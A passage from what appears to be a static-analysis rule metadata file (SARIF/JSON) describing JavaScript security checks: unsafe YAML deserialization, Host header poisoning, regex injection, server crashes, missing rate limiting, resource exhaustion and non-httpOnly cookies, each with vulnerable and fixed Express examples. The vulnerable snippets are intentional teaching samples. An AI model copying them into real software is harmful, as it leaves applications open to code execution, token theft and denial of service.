ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n", + "markdown" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-502" ], + "description" : "Deserializing user-controlled data may allow attackers to\n execute arbitrary code.", + "id" : "js/unsafe-deserialization", + "kind" : "path-problem", + "name" : "Deserialization of user-controlled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/host-header-forgery-in-email-generation", + "name" : "js/host-header-forgery-in-email-generation", + "shortDescription" : { + "text" : "Host header poisoning in email generation" + }, + "fullDescription" : { + "text" : "Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n", + "markdown" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-640" ], + "description" : "Using the HTTP Host header to construct a link in an email can facilitate phishing\n attacks and leak password reset tokens.", + "id" : "js/host-header-forgery-in-email-generation", + "kind" : "path-problem", + "name" : "Host header poisoning in email generation", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/regex-injection", + "name" : "js/regex-injection", + "shortDescription" : { + "text" : "Regular expression injection" + }, + "fullDescription" : { + "text" : "User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "User input should not be used in regular expressions without first being escaped,\n otherwise a malicious user may be able to inject an expression that could require\n exponential time on certain inputs.", + "id" : "js/regex-injection", + "kind" : "path-problem", + "name" : "Regular expression injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/server-crash", + "name" : "js/server-crash", + "shortDescription" : { + "text" : "Server crash" + }, + "fullDescription" : { + "text" : "A server that can be forced to crash may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-248", "external/cwe/cwe-730" ], + "description" : "A server that can be forced to crash may be vulnerable to denial-of-service\n attacks.", + "id" : "js/server-crash", + "kind" : "path-problem", + "name" : "Server crash", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/missing-rate-limiting", + "name" : "js/missing-rate-limiting", + "shortDescription" : { + "text" : "Missing rate limiting" + }, + "fullDescription" : { + "text" : "An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-770", "external/cwe/cwe-307", "external/cwe/cwe-400" ], + "description" : "An HTTP request handler that performs expensive operations without\n restricting the rate at which operations can be carried out is vulnerable\n to denial-of-service attacks.", + "id" : "js/missing-rate-limiting", + "kind" : "problem", + "name" : "Missing rate limiting", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/resource-exhaustion", + "name" : "js/resource-exhaustion", + "shortDescription" : { + "text" : "Resource exhaustion" + }, + "fullDescription" : { + "text" : "Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n", + "markdown" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400", "external/cwe/cwe-770" ], + "description" : "Allocating objects or timers with user-controlled\n sizes or durations can cause resource exhaustion.", + "id" : "js/resource-exhaustion", + "kind" : "path-problem", + "name" : "Resource exhaustion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/client-exposed-cookie", + "name" : "js/client-exposed-cookie", + "shortDescription" : { + "text" : "Sensitive server cookie exposed to the client" + }, + "fullDescription" : { + "text" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

